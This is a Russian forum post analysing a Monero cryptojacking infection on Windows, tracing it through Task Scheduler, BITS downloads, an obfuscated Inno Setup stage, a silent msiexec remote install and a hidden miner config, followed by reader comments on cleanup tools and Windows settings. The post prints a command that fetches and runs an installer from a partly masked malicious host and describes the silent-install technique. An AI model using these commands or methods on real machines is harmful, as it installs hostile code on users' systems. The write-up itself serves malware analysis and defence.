Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство "мастеров", думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker'ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ - открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В автозагрузке, повторюсь всё в порядке:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов - ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует "Планировщик заданий" (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Дальше я стал копать и выяснил, что бирюзовое окно - это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива - всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это - файл инсталлятора чего-либо:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, как оказалось, программа никаких файлов в себе не содержала - только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal'е, и получил следующий результат:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология
Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю - скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз - да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом - если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково - обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется "Info-Zip UnZip", и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик - что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает - распаковываются файлы только оригинальным UnZip'ом при помощи этой команды.
Все файлы внутри архива - исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Этот файл представляет собой json - конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету "Monero". Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера "****Rig":

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую "работу", и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом - никаких окон).

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

Информационная безопасность IT

1.4K постов25.5K подписчиков

Добавить пост

Правила сообщества

Обязательно к прочтению для авторов:

1. Если вы добавляете пост, утверждающий об утечке данных или наличии дыр в системе, предоставьте ссылку на источники или технически подкованное расследование. Посты из разряда "Какой-то банк слил данные, потому что мне звонили мошенники" будут выноситься в общую ленту.
2. Все вопросы "Как обезопасить сервер\приложение\устройство" - в лигу "Компьютер это просто".

Обязательно к прочтению для всех:

Добавление ссылки разрешено если она не содержит описание коммерческих (платных) продуктов и/или идентификаторов для отслеживания перехода и для доступа не нужен пароль или оплата в т.ч. интернет-ресурсы, каналы (от 3-х тематических видео), блоги, группы, сообщества, СМИ и т.д.


Запрещены политические holy wars.

По решению модератора или администратора сообщества пользователь будет забанен за:

1. Флуд и оскорбление пользователя, в т.ч. провокация спора, флуда, холивара (высказывание без аргументации о конкретной применимости конкретного решения в конкретной ситуации), требование уже данного ответа, распространение сведений порочащих честь и репутацию, принижающих квалификацию оппонента, переходы на личности.

2. Публикацию поста/комментария не соответствующего тематике сообщества, в том числе обсуждение администраторов и модераторов сообщества, для этого есть специальное сообщество.

3. За обвинение в киберпреступной деятельности.

4. За нарушение прочих Правил Пикабу.

Вы смотрите срез комментариев. Показать все
58
DELETED
Автор поста оценил этот комментарий

это всё хорошо, а как отловить и вычистить уже засевший майнер?

раскрыть ветку (106)
31
Автор поста оценил этот комментарий
По нагрузке на гпу
раскрыть ветку (72)
18
Автор поста оценил этот комментарий
Ну, как минимум майнер в посте майнит на cpu.
19
Автор поста оценил этот комментарий
Это ты конечно хорошо ответил, но мониторинг GPU в стандартных средствах появился (если я не ошибаюсь) только с Win 8, а так нужно скачивать хороший диспетчер задач
раскрыть ветку (66)
17
Автор поста оценил этот комментарий

в таск менеджере мониторинг гпу только недавно появился в обновлении 1709 для win10

раскрыть ветку (3)
2
Автор поста оценил этот комментарий

Я почему то думал что с он еще в 8 появился..

раскрыть ветку (2)
1
Автор поста оценил этот комментарий

sysinternals process explorer

Иллюстрация к комментарию
раскрыть ветку (1)
Автор поста оценил этот комментарий

Спасибо, знаем. А так я имел ввиду стандартный мониторинг GPU

3
Автор поста оценил этот комментарий
Gpu-z
37
Автор поста оценил этот комментарий

На Win7 и более ранних ОС уже лучше не сидеть, т.к. за ними особо больше не следят, и есть шанс, что в них найдут критическую уязвимость, продадут в дарквебе, и будут пользователи этих операционных систем кормить хозяев ботнетов.

раскрыть ветку (56)
50
Автор поста оценил этот комментарий

Ну не знаю... я вот пол дня вчера пытался людям сделать из 10 что то привычное для них (по типу win 7) и так себе мозг проебал что никакого желания уходить с 7 нет. А сколько ж лишнего дерьма в 10 по стандарту (типу xbox, onenote и т.д.) идут - пздц...

раскрыть ветку (51)
32
Автор поста оценил этот комментарий

Абсолютно согласен с последним утверждением - напихали говна всякого (с нашей точки зрения). С другой стороны, всё-таки ощущается, что ОС в целом очень стабильна, если настроить. Win7 у меня чаще зависала и лагала. Это субъективно, конечно.

Поначалу я тоже не мог привыкнуть, но пересилил себя. Сейчас не жалею.

Печально, что заказчикам (а тем более - просто рандомным людям) не объяснишь, чем опасно на старых ОС оставаться после завершения их поддержки.

раскрыть ветку (27)
22
Автор поста оценил этот комментарий

Меня больше всего взбесил центр обновлений на 10, я его и в службах на ручной запуск кинул и в настройках (время указал) а он все равно сам запускается и весь с-ка трафик сжирает, приходилось раз 5 вручную останавливать службу обновлений...

раскрыть ветку (21)
16
Автор поста оценил этот комментарий

Ооооо, вот это просто ад. Я через политики как-то это исправлял. Согласен, за такое надо пиздить :) Худшее, что я видел в операционных системах.

раскрыть ветку (8)
4
Автор поста оценил этот комментарий

Мне (первый раз за win 10) еще не хватало полезть в "политику", я и так мозг сломал в новой панели управления разбираясь что и куда они засунули и где искать те или иные настройки... я еле нашел где отключить UAC и SmartScreen что бы при установке и запуске программ каждый раз не спрашивало...

раскрыть ветку (2)
15
DELETED
Автор поста оценил этот комментарий

Пишешь в поисковой строке UAC или SmartScreen и все

Иллюстрация к комментарию
Иллюстрация к комментарию
раскрыть ветку (1)
10
Автор поста оценил этот комментарий
В принципе хороший вариант, но мы же не ищем лёгких путей :D
раскрыть ветку (4)
1
Автор поста оценил этот комментарий

Ну... Там отключаются обновы. Я-то не хочу их отключать. Я привык, чтобы поставил галочку - и обновления тебе предлагают установить, ненавязчиво так, раз в сутки. Это можно настроить, но через задницу)

раскрыть ветку (1)
2
Автор поста оценил этот комментарий

Или раз в неделю, но не когда ты, допустим, игрушку запустил.

2
Автор поста оценил этот комментарий

Вариант хороший, но моей проблемы он не решил бы, так как обновления в принципе нужны были, но в этот момент они жрали весь трафик

раскрыть ветку (1)
2
Автор поста оценил этот комментарий

В настройках сетевого подключения можно щёлкнуть "Лимитное подключение" и тогда он не должен обновы таскать по идее.

Иллюстрация к комментарию
4
Автор поста оценил этот комментарий
Я как то запретил защитнику винды проверку в реальном времени, спустя пару минут он обратно включился и удалил файлы, самостоятельный мля.
3
Автор поста оценил этот комментарий
Заходишь в параметры интернета, включаешь галку "Использовать как лимитное подключение" и все, обновы больше не качаются сами по себе.
раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Спасибо, буду знать

DELETED
Автор поста оценил этот комментарий

А я ещё и брандмауэр на ручной запуск кинул. В результате у меня все стандартные программы перестали запускаться. Винда такая винда.

А один суперфетч чего стоит! Нагружает хард до охуения, а когда выключаешь... То снова включается. Спасибо, гейтс!

раскрыть ветку (3)
Автор поста оценил этот комментарий

Не, это уже бред какой-то. Брандмауэр на это вообще не влияет.

раскрыть ветку (2)
DELETED
Автор поста оценил этот комментарий

Вот и я так думал.

Суть в том, что я отключил брандмауэр и центр обновлений через локальные службы.  (да, в прошлом комментарии неверно написал, именно отключил, а не поставил в ручной запуск).

Майкрософт стор начал усиленно качать обновления и на этапе установке прерывался, писал, что повторит установку позже. Из-за этого ни одна из стандартных программ (кроме эджа) не запускалась. Я включил службы брандмауэра и центра обновлений, перезагрузился и всё заработало.

Странно, но сейчас я попробовал повторить проблему, но у меня не получилось. Странно, хотя, может, это было именно из-за тех обновлений.

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Всего скорее, ты отключил не центр обновлений, а процесс. Точно не помню какой - есть TrustedModuleInstaller например, или WindowsModuleInstaller, что более вероятно. Тоже его отключал, когда винчестер сдох, потому что из-за него он постоянно зависал. Но из-за этого не мог использовать некоторые программы и так же не мог установить Visual C++

1
Автор поста оценил этот комментарий

Можно проставить интернетное подключение как лимитное. Винда даже скачать эти ваши апдейты не сможет.

Автор поста оценил этот комментарий

Пишешь батник с остановкой службы и в автозагрузку. Делов то…

раскрыть ветку (3)
2
Автор поста оценил этот комментарий

А если она сразу же перезапускается после остановки?

раскрыть ветку (2)
Автор поста оценил этот комментарий

Не. Проверено. Полгода батник висит у меня - не запускается.

Главное - чтобы от админа батник запускался. Иначе не срабатывает.

раскрыть ветку (1)
2
Автор поста оценил этот комментарий

Если подумать логически то не для всех служб такое прокатит... так как другие службы тоже могут запускать убитую нами службу

4
Автор поста оценил этот комментарий

Клиент обновился до 10-ки - слетела программа мониторинга веб-камер и еще одна софтина, ключевая в работе. На сайте индусокитайских разработчиков драйверов под 10 нет.

Откатили ОС обратно. А что делать...

раскрыть ветку (1)
2
Автор поста оценил этот комментарий

Ну да. Я тут читаю иногда истории о том, как всякими ЧПУ станками или чем-то таким управляют ПК чуть ли не с DOS :D

4
Автор поста оценил этот комментарий
У меня win7 с аптаймом в месяц, перед этим аптайм был около 3 месяцев, я её тупо не ребутаю, гибернация и всё, просто лень проекты закрывать/открывать. Это при том, что я еще периодически в сталкера люблю побегать.
раскрыть ветку (2)
Автор поста оценил этот комментарий

У меня специфивеские задачи. На пк работают, к примеру, отладчики, дизассемблеры, декомпиляторы, специальные драйверы. Например, в отладчике x64dbg была такая фигня, что он начинал жрать память и процессор. на win7, а учитывая, что он работал в высоком приоритете, он вешал систему почти намертво. В десятке процесс можно было попытаться убить)


Наверняка для каких-то целей семёрка будет лучше, не спорю. Именно для меня лучше win10, а семёрку я могу на виртуальной машине погонять :)

Автор поста оценил этот комментарий
Да у меня в принципе так же, только время от времени все же перезанружаю
2
Автор поста оценил этот комментарий

LTSB для кого придумали?

1
DELETED
Автор поста оценил этот комментарий

Dws убирает процентов 80 дичи из десятки, оставшиеся 20 доп утилитами.

3
Автор поста оценил этот комментарий
Я себя успокоил установив Classic Shell - сделав меню Пуск как у 7, и утилиту AVG TuneUp воткнул. С помощью нее 10 становится более дружелюбной.
Автор поста оценил этот комментарий
А не подскажешь, на 10 перестал запускаться Пуск. Вот все работает, а пуска нет. Что делать?
нашел как то вариант, что нужно нового пользователя создать, не помогло
раскрыть ветку (2)
1
Автор поста оценил этот комментарий
Попробуй прогу Stardock Start 10 (настраиваемый пуск для win10)

https://mega.nz/#!9X5hFIxR!258BSPOVtN6ymAkv4rQFTkTO6xbs7RzBo...

Автор поста оценил этот комментарий

У меня так как-то на пиратке слетела какая-то штука, которая отвечала за всплывающие окна типа календаря, уведомлений и самого пуска. Сначала пробовала разобраться, потом стало влом. Через пару лет система слетела, пришло ставить лицензию, что все эти два года благополучно валялась в папке. Теперь так непривычно, что все пока работает... =)
Но с чего эта фигня слетает все равно любопытно.

PS: блин, читаешь пост и чувствуешь какой-то охотничий азарт...)

Автор поста оценил этот комментарий
Есть нормальная десятка. Это Windows 10 Enterprise LTSB. Все говно вырезано, кортана, эдж, магазин вместе с его приложениями. Обновлений меньше и важные, можно спокойно их отключить. Поддерживается 10 лет!(обновы будут, дыры латать). Унаследовала лучшие качества 10-ки и 7-ки. Единственное, установлен OneDrive, но его можно легко удалить.

Но есть нюанс: её физ. лицам не продают, только для предприятий. Но никто не мешает пиратить.
2
Автор поста оценил этот комментарий

Насколько я помню, есть slim версия - это как раз без говна всякого. А в плане привычности - а в чём практическое отличие от 7, кроме внешнего вида окон? Так-то чай не 8 до 8.1, с семёркой десятка похожи.

раскрыть ветку (10)
7
Автор поста оценил этот комментарий
а в чём практическое отличие от 7, кроме внешнего вида окон?

любая кастомицазия системы засунута в такие дебри, что без гугла даже смену раскладки не сделать.

конкретно с моим ноутом на 10-ке начинает отваливаться wi-fi. и под 10 и ниже. и танцы с бубном. тем не менее сетка рандомно отваливается.

раскрыть ветку (1)
Автор поста оценил этот комментарий

аналогично. Обновления этой зимой сломали мне совместимость с дровами на вай-фай. Снес 10 и поставил восьмерку.

5
Автор поста оценил этот комментарий

Для обычного пользователя дело только во внешнем виде "Пуск" и "Проводник", а вот меня в ней (win 10) практически все раздражает

2
Автор поста оценил этот комментарий

Есть windows 10 LTSB версия, где много говна сразу убрано, бывает отключены сразу защитник, смартскрин и uac.

раскрыть ветку (6)
8
DELETED
Автор поста оценил этот комментарий

А еще отключен поиск, и несколько других полезных фишек. Зачем вы тогда на 10 переходите, если так корежите ее потом? Сидите на семерке.

раскрыть ветку (4)
1
Автор поста оценил этот комментарий

А также отключена почти вся отправка всего в майкрософт, вес у нее поменьше, нет этих ваших бесполезных фишек.
Переход на более новую версию винды обычно обусловлен лишь тем, что нет поддержки новых программ и игр. А так бы - большинство сидело бы на хр до сих пор - жрет мало, делает быстро, в диспетчере около 20 процессов и ничего лишнего (да, дыры в безопасности, но большинству на них плевать).

2
Автор поста оценил этот комментарий

Драйверов под 7 уже не сыщешь ))

ещё комментарии
1
Автор поста оценил этот комментарий
Будем знать, хотя и вряд ли понадобиться...
1
Автор поста оценил этот комментарий
И все же весь хлам можно и удалить при желании...
раскрыть ветку (2)
1
Автор поста оценил этот комментарий
Xbox, OneNote и еще некоторые элементы я никак не смог удалить
раскрыть ветку (1)
1
Автор поста оценил этот комментарий
Dws lite
Автор поста оценил этот комментарий
LTSB версия 10ки лишена всего этого говна
раскрыть ветку (1)
2
Автор поста оценил этот комментарий

Буду иметь ввиду, но один фиг с 7ки переходить не собираюсь

1
Автор поста оценил этот комментарий

Уязвимости всех видов процессоров и уязвимости протоколов SMB до последнего года что-то никто не использует особо.

раскрыть ветку (2)
2
Автор поста оценил этот комментарий
Wannacry как-раз использовал smb.
Автор поста оценил этот комментарий

SMB активно используют, кстати. Ну так нашли-то его недавно (точнее, в руки обычных смертных он попал). В принципе, уязвимости SMB может использовать даже человек, который вообще не шарит в кодинге. Одно дело - это самому писать эксплоиты, другое - когда есть готовый тулкит фактически (а утёкший набор ShadowBroker - это как раз-таки тулкит). Поэтому будут ещё, будут, никто не торопится их закрывать, как показывает практика обеспечения ИБ :)

А по поводу процессоров - да, но я особо не разбирался с тонкостями практической реализации. Только на днях узнал, что в августе обнаружили аппаратные закладки снова. Надо будет подробнее это изучить :)

Автор поста оценил этот комментарий
Дак на семерке только определенные программы работают. Софты для программаторов, прошивальщиков, и всякой софтины
1
Автор поста оценил этот комментарий
Аида 64 в помощь
раскрыть ветку (3)
Автор поста оценил этот комментарий
Ещё проще: hwmonitor
Автор поста оценил этот комментарий

А как она поможет мониторить загрузку GPU по процессам?

раскрыть ветку (1)
1
Автор поста оценил этот комментарий
По процессам никак, но общую нагрузку показывает, если в простое все нормально, смысл лезть в дебри, виджет прикрутил и следи
3
Автор поста оценил этот комментарий

Компьютер не будет майнить, если у тебя нет гпу. Негр.jpg

раскрыть ветку (1)
1
DELETED
Автор поста оценил этот комментарий

Будет майнить на проце. Все монетки на криптонайте хорошо копаются на проце.

1
Автор поста оценил этот комментарий

А если ГПУ настолько ведро, что даже в диспетчере задач не показывается, но идёт нагрузка на ЦП и оперативную память из неоткуда? ВДРУГ ОНИ ВСЁ-ТАКИ ПЫТАЮТСЯ?!

Автор поста оценил этот комментарий

По нагрузке на вентилятор (ой, кулер)! :)

24
Автор поста оценил этот комментарий

Вычистить?

Запустите ПК в безопасном режиме и проверьте его DRWeb CureIt! и tdsskiller.

Можете после этого самостоятельно проверить все службы через services.msc, автозагрузку, прочекать процессы в памяти на VirusTotal через переименованный в случайное имя ProcessExplorer.

раскрыть ветку (21)
27
DELETED
Автор поста оценил этот комментарий

Кстати, один из тех вирусов, что стоял на том компе блочил вход в безопаску.

раскрыть ветку (16)
15
Автор поста оценил этот комментарий

Умно) Тогда LiveCD, наверное.

раскрыть ветку (14)
9
DELETED
Автор поста оценил этот комментарий

Он и вырулил отчасти. Линукс запустил, потом уже прошелся каспером для линукс.

раскрыть ветку (13)
2
Автор поста оценил этот комментарий

Не знаю под каким комментом спросить, спрошу здесь.

Теперь уже не обязательно открывать бяку, чтобы заразить компьютер? Достаточно ее скачать?

раскрыть ветку (2)
Автор поста оценил этот комментарий

нет

Автор поста оценил этот комментарий

Даже не обязательно скачивать. Достаточно оказаться в зараженной сети, скажем wifi, и отсутствием обновления на оси.

ещё комментарии
1
Автор поста оценил этот комментарий

AVZ  в помощь)) Таки спасибо за статью!!!

1
DELETED
Автор поста оценил этот комментарий
Комментарий удален. Причина: данный аккаунт был удалён
раскрыть ветку (1)
9
Автор поста оценил этот комментарий

Да ничего, хороший вопрос.

Сначала я хотел написать длинную простыню со списком того, что нужно понять и изучить, но потом подумал, что легче всего начать с прочтения двух книг: первая - про внутреннее устройство ОС Windows (все равно 80% вирусов пишутся под неё), вторая - про архитектуру современных вирусов.

Первое даже важнее. Если ты понимаешь, как работает операционная система, тебе должно быть очевидно, как должны работать вирусы.

А дальше уже можно изучать инструментарий. Разобраться в том, как устроены программы, что такое шестнадцатеричные редакторы, дизассемблеры, декомпиляторы, мониторы реестра и файловой системы, песочницы, виртуальные машины.

Обычно очень хорошо разбираются в том, как работают вирусы, люди, которые знают системное программирование и реверс-инжиниринг. То есть могут не просто запустить программу в песочнице (вроде Sandboxie) и посмотреть, что вирус делает (а в песочнице он может просто отказаться работать), а изучить алгоритм его работы изнутри. А ещё хорошо разбираются в них люди, которые эти вирусы пишут. Но рекомендовать такой метод самообразования я не могу =D

Если подойти к этой проблеме с другой стороны, то надо задать вопрос и получить на него максимально развёрнутый ответ.

Вопрос такой: каковы основные задачи вируса и как они достигаются?

Задачи следующие (условно):


- проникнуть на компьютер (в телефон, роутер, в банкомат, кассу, умные часы и так далее);
- скрыть своё присутствие и своё поведение от системы, пользователя, антивирусов, аналитиков (тут нужно изучить такие темы, как руткиты, антиэмуляция, антиотладка);
- сделать свое присутствие в системе постоянным (интересные темы для изучения - методы автозагрузки, службы и демоны операционной системы, драйверы, инжектирование библиотек в процессы, планировщики заданий, стартовые скрипты и так далее);
- выполнять какие-либо действия;
- желательно - размножиться (тут надо читать про уязвимости и эксплоиты, про сетевых червей и так далее). Эта тема пересекается с первой (темой проникновения на ПК).

Дальше нужно понять, как все эти этапы претворяются в жизнь.

Например, возьмем попадание вируса на компьютер.

- Самое простое - вы запустите программу сами, а эта программа склеена с вирусом.
- Или же в вашей операционной системе, браузере, видеоплеере или в чём-то ещё есть ошибка (при этом не установлены обновления), и вирус использует эту ошибку для проникновения.
- Или же программа автоматически запустится, когда вы вставите диск или флешку в компьютер (если включен автозапуск). Или же вирус запустится, когда вы откроете документ Word, пришедший по электронной почте.
- Вы можете даже скачать образ операционной системы, в которую уже встроен вирус (особенно если это сборка).
И так далее. Вариантов масса. Если вы в каждом разберетесь, начнете понимать, как это всё работает.

На каждую из этих тем (проникновение в компьютерные системы, антиотладка и антиэмуляция, руткиты, закрепление в системе и бэкдоры, эксплуатация уязвимостей) написаны хорошие статьи и книги.

Эта тема не так уж и проста. Я лет 15 (с первого курса университета, и даже раньше) изучаю программирование, информационную безопасность и вирусы, работаю в этой области, даже пишу кое-какие статьи, но до сих пор не во всём разбираюсь досконально.

Это целая профессия, но она поддается освоению, если тема вас захватывает. А тема эта действительно очень интересная и крутая :)

1
Автор поста оценил этот комментарий
А как же переменная %systemroot% насколько мне известно сначала вирусы, и прочая гадость заполняют это место, а потом распределяются
раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Да, можно прочекать, согласен с вами полностью!

9
Автор поста оценил этот комментарий

установи Process Explorer + хороший сканер автозагрузки -- чтобы он умел сразу в totalvirus файлики загонять и сразу увидишь всякую левую дичь что у тебя есть в винде

раскрыть ветку (8)
7
Автор поста оценил этот комментарий
Autoruns из пакета systeminternals
раскрыть ветку (6)
раскрыть ветку (1)
Автор поста оценил этот комментарий
Ничего страшного, нормально гуглится и по ошибочному названию
Автор поста оценил этот комментарий

угу. забыл просто как оно называется.

раскрыть ветку (2)
Автор поста оценил этот комментарий

Извините, перешел с вышеупомянутых на Anvir. Плохо?

раскрыть ветку (1)
Автор поста оценил этот комментарий

хз, не пользовался им. главное чтобы показывал все-все места где тварь может вписаться в автозагрузку... включая планировщик задач, расширения браузеров, сервисы винды и т.п.

Автор поста оценил этот комментарий

И тебе спасибо)

1
Автор поста оценил этот комментарий

Спасибо!

1
Автор поста оценил этот комментарий

Знал бы автор про Autoruns, то поста бы не было. Рутина ппц.

2
Автор поста оценил этот комментарий
если нету глубоких знаний то переустанрвка винды . Майнеры делаются чтоб их не нашли . Если не знаете где искать .
Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку